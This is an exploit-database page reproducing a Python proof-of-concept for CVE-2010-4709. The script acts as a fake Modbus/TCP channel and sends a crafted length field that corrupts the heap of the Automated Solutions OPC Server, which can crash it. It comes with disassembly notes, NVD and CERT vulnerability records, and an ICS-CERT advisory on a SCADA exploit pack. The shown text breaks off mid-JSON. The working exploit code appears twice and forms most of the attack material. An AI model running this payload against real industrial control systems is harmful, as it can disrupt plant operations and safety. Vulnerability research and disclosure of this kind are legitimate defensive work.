Search...

Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC

2011-01-25T00:00:00

ID EDB-ID:16040
Type exploitdb
Reporter Jeremy Brown
Modified 2011-01-25T00:00:00

Description

Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC. CVE-2010-4709. Dos exploit for windows platform

                                        
                                            #!/usr/bin/python
# asmb-heap.py
# Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
# 
# A specially crafted length field in a MODBUS packet header can trigger heap corruption.
#
# 00408312  |&gt; 8B5424 3C      MOV EDX,DWORD PTR SS:[ESP+3C] -&gt; move length into edx
# 00408316  |. 53             PUSH EBX                      -&gt; push src onto stack
# 00408317  |. 8B5C24 3C      MOV EBX,DWORD PTR SS:[ESP+3C] -&gt; move dest into ebx 
# 0040831B  |. 8BCA           MOV ECX,EDX                   -&gt; move length into ecx
# 0040831D  |. 55             PUSH EBP                      -&gt; push ebp onto stack
# 0040831E  |. 8BE9           MOV EBP,ECX                   -&gt; move ecx into ebp
# 00408320  |. 57             PUSH EDI                      -&gt; push edi onto stack
# 00408321  |. 33C0           XOR EAX,EAX                   -&gt; eax = 0
# 00408323  |. 8BFB           MOV EDI,EBX                   -&gt; move dest into edi
# 00408325  |. 895C24 1C      MOV DWORD PTR SS:[ESP+1C],EBX -&gt; move ebx into dword at esp+1c
# 00408329  |. C1E9 02        SHR ECX,2                     -&gt; shift ecx right twice
# 0040832C  |. F3:AB          REP STOS DWORD PTR ES:[EDI]   -&gt; fill ecx dwords at edi with eax
#
# So basically memset(edi,eax,ecx). We control ecx, so we have control over the number of dwords
# it writes in the heap buffer. But, as you can see, the dwords themselves are not controllable,
# they are NULL. However, we can still write past the bounds of the allocated chunk of memory.
#
# Although it seems unlikely code execution could result, it is still possible to write data
# past the memory allocated on a heap (0x350000) available in the server process.
#
# This code works by setting up a fake channel and accepting a connection. To trigger this
# vulnerability, the server simply needs to initiate communication (monitor mode would be ideal)
# with this fake channel and the results depend on the response you choose.
#
# I tested version 3 running on Windows. Testing the server with this code and its default
# response should't cause the server to crash (immediately anyways). Larger lengths (such as
# the one commented out) may cause the server to crash.
#
# Patch: http://automatedsolutions.com/demos/demoform.asp?code=17
#

import sys
import socket

port=502

#       [trans]    [prot]     [len]      [u]   [f]    [bc]    [data]
resp="\x00\x00"+"\x00\x00"+"\x02\x01"+"\x00"+"\x03"+"\x02"+"\x00\x00" # break @ 40832c, dump edi, keep hitting f9 and watch (debug)
#resp="\x00\x00"+"\x00\x00"+"\x02\xb0"+"\x00"+"\x03"+"\x02"+"\x00\x00" # Heap block at 0035F2D0 modified at 0035F4E7 past requested size of 20f

try:
     sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     sock.bind(("",port))
     sock.listen(1)
     conn,addr=sock.accept()

except IOError,e:
     print e

print "OPC server at %s connected\n"%addr[0]

req=conn.recv(32)
print "&lt;-- %s"%req.encode("hex")

conn.send(resp)
print "--&gt; %s\n"%resp.encode("hex")
conn.close()

print "finished, check server"

JSON Vulners Source

Initial Source

{"id": "EDB-ID:16040", "hash": "633c88d6d10268f3d77b9aa1f1da14dd", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC", "description": "Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC. CVE-2010-4709. Dos exploit for windows platform", "published": "2011-01-25T00:00:00", "modified": "2011-01-25T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16040/", "reporter": "Jeremy Brown", "references": [], "cvelist": ["CVE-2010-4709"], "lastseen": "2016-02-01T22:59:32", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/16040/", "sourceData": "#!/usr/bin/python\r\n# asmb-heap.py\r\n# Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC\r\n# Jeremy Brown [0xjbrown41-gmail-com]\r\n# Jan 2011\r\n# \r\n# A specially crafted length field in a MODBUS packet header can trigger heap corruption.\r\n#\r\n# 00408312 |> 8B5424 3C MOV EDX,DWORD PTR SS:[ESP+3C] -> move length into edx\r\n# 00408316 |. 53 PUSH EBX -> push src onto stack\r\n# 00408317 |. 8B5C24 3C MOV EBX,DWORD PTR SS:[ESP+3C] -> move dest into ebx \r\n# 0040831B |. 8BCA MOV ECX,EDX -> move length into ecx\r\n# 0040831D |. 55 PUSH EBP -> push ebp onto stack\r\n# 0040831E |. 8BE9 MOV EBP,ECX -> move ecx into ebp\r\n# 00408320 |. 57 PUSH EDI -> push edi onto stack\r\n# 00408321 |. 33C0 XOR EAX,EAX -> eax = 0\r\n# 00408323 |. 8BFB MOV EDI,EBX -> move dest into edi\r\n# 00408325 |. 895C24 1C MOV DWORD PTR SS:[ESP+1C],EBX -> move ebx into dword at esp+1c\r\n# 00408329 |. C1E9 02 SHR ECX,2 -> shift ecx right twice\r\n# 0040832C |. F3:AB REP STOS DWORD PTR ES:[EDI] -> fill ecx dwords at edi with eax\r\n#\r\n# So basically memset(edi,eax,ecx). We control ecx, so we have control over the number of dwords\r\n# it writes in the heap buffer. But, as you can see, the dwords themselves are not controllable,\r\n# they are NULL. However, we can still write past the bounds of the allocated chunk of memory.\r\n#\r\n# Although it seems unlikely code execution could result, it is still possible to write data\r\n# past the memory allocated on a heap (0x350000) available in the server process.\r\n#\r\n# This code works by setting up a fake channel and accepting a connection. To trigger this\r\n# vulnerability, the server simply needs to initiate communication (monitor mode would be ideal)\r\n# with this fake channel and the results depend on the response you choose.\r\n#\r\n# I tested version 3 running on Windows. Testing the server with this code and its default\r\n# response should't cause the server to crash (immediately anyways). Larger lengths (such as\r\n# the one commented out) may cause the server to crash.\r\n#\r\n# Patch: http://automatedsolutions.com/demos/demoform.asp?code=17\r\n#\r\n\r\nimport sys\r\nimport socket\r\n\r\nport=502\r\n\r\n# [trans] [prot] [len] [u] [f] [bc] [data]\r\nresp=\"\\x00\\x00\"+\"\\x00\\x00\"+\"\\x02\\x01\"+\"\\x00\"+\"\\x03\"+\"\\x02\"+\"\\x00\\x00\" # break @ 40832c, dump edi, keep hitting f9 and watch (debug)\r\n#resp=\"\\x00\\x00\"+\"\\x00\\x00\"+\"\\x02\\xb0\"+\"\\x00\"+\"\\x03\"+\"\\x02\"+\"\\x00\\x00\" # Heap block at 0035F2D0 modified at 0035F4E7 past requested size of 20f\r\n\r\ntry:\r\n sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n sock.bind((\"\",port))\r\n sock.listen(1)\r\n conn,addr=sock.accept()\r\n\r\nexcept IOError,e:\r\n print e\r\n\r\nprint \"OPC server at %s connected\\n\"%addr[0]\r\n\r\nreq=conn.recv(32)\r\nprint \"<-- %s\"%req.encode(\"hex\")\r\n\r\nconn.send(resp)\r\nprint \"--> %s\\n\"%resp.encode(\"hex\")\r\nconn.close()\r\n\r\nprint \"finished, check server\"\r\n", "osvdbidlist": ["70637"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-08-17T11:15:02", "references": ["http://www.securityfocus.com/bid/45974", "http://automatedsolutions.com/pub/asmbtcpopc/readme.htm", "http://www.us-cert.gov/control_systems/pdf/ICSA-10-322-02A.pdf", "http://www.vupen.com/english/advisories/2011/0209", "http://www.exploit-db.com/exploits/16040", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64944", "http://www.kb.cert.org/vuls/id/768840"], "description": "Heap-based buffer overflow in Automated Solutions Modbus/TCP Master OPC Server before 3.0.2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a MODBUS response packet with a crafted length field.", "edition": 2, "reporter": "NVD", "published": "2011-01-28T11:00:02", "title": "CVE-2010-4709", "type": "cve", "enchantments": {"score": {"modified": "2017-08-17T11:15:02", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-4709"], "scanner": [], "modified": "2017-08-16T21:33:20", "cpe": ["cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.9", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.0", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.11", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.8", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.12.3", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.3", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.2", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.0a", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:3.0.0", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7f", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.3a", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7d", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.1", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.10", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7b", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.9_build_2.9.3", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.6", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.12.1", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.4a", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7a", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.9.4", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.9.5", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.12", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7e", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:3.0.1", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.5", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.2a", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.4", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.7c", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.0_build_1", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.9.1", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.6b", "cpe:/a:automatedsolutions:modbus%2ftcp_master_opc_server:2.6a"], "id": "CVE-2010-4709", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-08-31T02:38:10", "references": ["http://automatedsolutions.com/pub/asmbtcpopc/readme.htm", "http://automatedsolutions.com/pub/asmbtcpopc/readme.htm", "http://www.us-cert.gov/control_systems/pdf/ICSA-10-322-02A.pdf", "http://www.us-cert.gov/control_systems/pdf/ICSA-10-322-02A.pdf", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709"], "description": "### Overview\n\nAutomated Solutions OPC Server contains a heap corruption vulnerability in the Modbus/TCP Master OPC server.\n\n### Description\n\nAutomated Solutions Modbus/TCP Master OPC Server contains a heap corruption vulnerability. The server is vulnerable to an attacker writing an arbitrary number of double words or DWORDs onto the heap. \n\nFor additional information see [ICSA-10-322-02A](<http://www.us-cert.gov/control_systems/pdf/ICSA-10-322-02A.pdf>). \n \nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact\n\nSuccessful exploitation would likely not allow arbitrary code execution; however, an exploit could possibly corrupt the OPC server memory and cause a denial of service. \n \n--- \n \n### Solution\n\n**Upgrade** \n \nAccording to the Modbus/TCP OPC Server [readme](<http://automatedsolutions.com/pub/asmbtcpopc/readme.htm>) file, version 3.0.2 addresses this vulnerability. \n \n--- \n \n**Restrict Access** \n \nEnable firewall rules to restrict access to only trusted sources. \n \n--- \n \n### Vendor Information \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nAutomated Solutions| | -| 26 Jan 2011 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23768840 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://automatedsolutions.com/pub/asmbtcpopc/readme.htm>\n * <http://www.us-cert.gov/control_systems/pdf/ICSA-10-322-02A.pdf>\n\n### Credit\n\nThanks to Jeremy Brown for reporting this vulnerability to ICS-CERT.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n * CVE IDs: [CVE-2010-4709](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>)\n * Date Public: 22 Nov 2010\n * Date First Published: 03 Feb 2011\n * Date Last Updated: 03 Feb 2011\n * Severity Metric: 1.02\n * Document Revision: 22\n\n", "edition": 3, "reporter": "CERT", "published": "2011-02-03T00:00:00", "title": "Automated Solutions Modbus/TCP Master OPC server Modbus TCP header vulnerability", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2010-4709", "CVE-2010-4709"], "modified": "2011-02-03T00:00:00", "id": "VU:768840", "href": "https://www.kb.cert.org/vuls/id/768840", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2018-09-06T20:02:09", "references": ["https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-11-096-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4741", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4741", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4741", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-11-096-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4598", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4598", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4598", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-11-096-01 GLEG Agora SCADA+ Exploit Pack&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-11-096-01&site_name=ICS-CERT", "https://ics-cert.us-cert.gov/Report-Incident?", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0760", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0760", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0760", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1340", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1340", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1340", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0175", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0175", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0175", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2639", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2639", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2639", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-11-096-01 GLEG Agora SCADA+ Exploit Pack&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-11-096-01&site_name=ICS-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2974", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2974", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2974", "http://www.us-cert.gov/privacy/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4142", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4142", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4142", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-11-096-01 GLEG Agora SCADA+ Exploit Pack&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-11-096-01&site_name=ICS-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1341", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1341", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1341", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-11-096-01", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4740", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4740", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4740"], "description": "## OVERVIEW\n\nOn March 15, 2011, GLEG Ltd. announced the Agora SCADA+ Exploit Pack for Immunity\u2019s CANVAS system. CANVAS is a penetration testing framework that is extensible using CANVAS Exploit Packs. On March 25, 2011, GLEG announced it would be adding exploits for the 35 vulnerabilities released by Luigi Auriemma on March 21, 2011. The ICS-CERT has not received any reports of this tool being used for an unauthorized compromise of an actual control system installation.\n\nICS-CERT has prepared this advisory to provide an initial summary of the possible vulnerabilities contained in this exploit pack. Please note that at this time, the information contained in this report is not conclusive, nor is it comprehensive. This report represents a cursory and credible snapshot of the vulnerabilities that are likely contained in the pack, based on the analysis conducted by ICS-CERT.\n\n## AFFECTED PRODUCTS\n\nImmunity\u2019s CANVAS is a penetration framework similar to the popular Metasploit tool. GLEG is a small company based in Moscow, Russia, that produces add-on exploit packages for Canvas. On March 22, 2011, GLEG\u2019s CEO, Yuriy Gurkin, announced that its website was under a distributed denial-of-service (DDoS) attack with traffic exceeding 100 Gb per day. The source and intent of this traffic is unknown at this time.\n\n## IMPACT\n\nICS-CERT contacted Immunity and obtained a general list of the targeted products and exploits (with very limited vulnerability details) contained in the Agora SCADA+ Exploit Pack. ICS-CERT has analyzed the data and surmises that of the 24 vulnerabilities, 18 are previously known and patched. One product could not be identified from the information provided. After consultation with the affected vendors, it appears that the remaining five may be true zero-day vulnerabilities. However, because the technical details of the vulnerabilities are not known, ICS-CERT\u2019s analysis is not conclusive and vendors may have a difficult time addressing and patching these suspected vulnerabilities.\n\nICS-CERT contacted each of the identified vendors to inform them of the GLEG product. Some vendors have reached out to GLEG directly for additional information. ICS-CERT is also attempting to work with GLEG to obtain additional information and will update this reporting it as it becomes available.\n\n## REFERENCES\n\nICS\u2212ALERT-11-080-01 Multiple Vulnerabilities in Siemens Tecnomatix Factorylink \nICS\u2212ALERT-11-080-02 Multiple Vulnerabilities in Iconics Genesis (32 & 64) \nICS\u2212ALERT-11-080-03 Multiple Vulnerabilities ion 7-Technologies IGSS \nICS\u2212ALERT-11-080-04 Multiple Vulnerabilities in Realflex RealWin\n\n_Table 1. Known vulnerabilities likely included in the Agora SCADA+ Pack_\n\n \n**P****roduct**| \n\n**E****x****p****l****oit**\n\n| \n\n**CVE**\n\n| \n\n**ICS-CERT Advisory** \n \n---|---|---|--- \n \nIndusoft SCADA web studio 7.0 heap corruption\n\n| \n\nHeap corruption\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488>)[011-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488>)[0488](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488>)\n\n| \n\n** \n \nSCADA Trace Mode Data Center\n\n| \n\nFile \ndisclosure\n\n| \n\nNone\n\n| \n\n** \n \nIGSS SCADA odbc server\n\n| \n\nDoS\n\n| \n\nNone\n\n| \n\nICSA-11-018-02 \u2212 IGSS ODBC Server Remote Heap Corruption \n \nOPC Modbus Ethernet \nOPC Server\n\n| \n\nDoS\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>) \n[4709](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>)\n\n| \n\nICSA-10-322-02A - Automated Solutions OPC Server Vulnerability \n \nITS scada\n\n| \n\nSQL \nInjection\n\n| \n\nNone\n\n| \n\nDemo website according to vendor, no ICS Product produced \n \nAutomated Solutions \nModbus/TCP OPC Server\n\n| \n\nRemote Heap Corruption\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>)[4709](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4709>)\n\n| \n\nICSA-10-322-02A - Automated Solutions OPC Server Vulnerability \n \nBACnet OPC client before 1.0.25\n\n| \n\nArbitrary code execution\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4740>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4740>)[4740](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4740>)\n\n| \n\nICSA-10-264-01 - SCADA Engine BACnet OPC Client Buffer Overflow \n \nAdvantech Studio 6.1 Web server\n\n| \n\nDoS\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488>)[011-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488>)[0488](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0488>)\n\n| \n\nICSA-10-337-01 \u2212 Advantech_Studio_Buffer_Overflow \n \nICONICS Dialog Wrapper Module ActiveX control\n\n| \n\nExploit\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6488>)[006-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6488>) \n[6488](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6488>)\n\n| \n\n* \n \nBECK GMBH, INDUSTRIAL PC -\n\n| \n\n[IPC@CHIP](<mailto:IPC@CHIP>) DoS\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1340>)[001-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1340>)[1340](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1340>)\n\n| \n\n* \n \nBECK GMBH, INDUSTRIAL PC -\n\n| \n\n[IPC@CHIP](<mailto:IPC@CHIP>) credentials stealing\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1341>)[001-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1341>)[1341](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1341>)\n\n| \n\n* \n \nSafeNet Sentinel Protection Server <= 7.4.1.0 + \nSentinel Keys Server <= 1.0.4.0 \nDATARATE SCADA <= 2.5\n\n| \n\nDirectory Traversal\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0760>)[008-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0760>)[0760](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0760>)\n\n| \n\n* \n \nSCADA MOXA Device Manager Tool 2.1\n\n| \n\nBuffer Overflow\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4741>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4741>)[4741](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4741>)\n\n| \n\nICSA-10-301-01 - Moxa Device Manager Buffer Overflow \n \nEcava IntegraXor\n\n| \n\nWeb directory traversal\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4598>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4598>)[4598](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4598>)\n\n| \n \nGE Fanuc Real Time Information Portal 2.6.\n\n| \n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0175>)[008-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0175>)[0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0175>)\n\n| \n\n* \n \nCitect SCADA ODBC\n\n| \n\nBuffer \nOverflow\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2639>)[008-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2639>)[2639](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2639>)\n\n| \n\n* \n \nInvensys Wonderware InFusion SCADA (and other products) ActiveX.\n\n| \n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2974>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2974>)[2974](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2974>)\n\n| \n\nICSA-10-208-01-Wonderware ArchestrA ActiveX Controla \n \nDATAC RealWin SCADA 1.06\n\n| \n\nBuffer Overflow Exploit\n\n| \n\n[CVE-2](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4142>)[010-](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4142>)[4142](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4142>)\n\n| \n\nICSA-10-313-01 - RealWin Buffer Overflows \n \n* Vulnerability predates ICS-CERT, therefore no Advisory was published\n\n** Vulnerability is known, but technical details are currently unknown\n\n## ZERO-DAY VULNERABILITIES\n\nFive vulnerabilities appear to be true zero-day vulnerabilities. Because the technical details of the vulnerabilities are unknown, ICS-CERT\u2019s analysis is not conclusive and vendors may have a difficult time addressing and patching these suspected vulnerabilities. ICS-CERT has contacted the affected vendors and provided them with the available information. Some vendors have reached out to GLEG directly for additional information. ICS-CERT will continue to work with the affected vendors and will provide analysis support as needed. Also, ICS-CERT will update this report as needed.\n\n## MITIGATION\n\nICS-CERT recommends that asset owners and operators routinely audit their systems and apply updates as they become available or when possible. As with all system changes, administrators should consult their control systems vendor prior to making any control system changes.\n\nOrganizations observing suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents. ICS-CERT reminds organizations that proper impact analysis and risk assessment should be performed prior to taking defensive measures.\n\nThe Control System Security Program provides numerous recommended practices ICS-CERT CONTACT for control systems on the US-CERT website. Several relevant recommended practices are available for reading or download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\n * a. There is no URL for this document because it was released exclusively on the US-CERT portal.\n", "edition": 6, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2011-04-06T00:00:00", "title": "GLEG Agora SCADA+ Exploit Pack", "type": "ics", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-0488", "CVE-2001-1341", "CVE-2010-4709", "CVE-2010-2974", "CVE-2008-2639", "CVE-2008-0760", "CVE-2010-4741", "CVE-2010-4142", "CVE-2010-4740", "CVE-2001-1340", "CVE-2010-4598", "CVE-2008-0175", 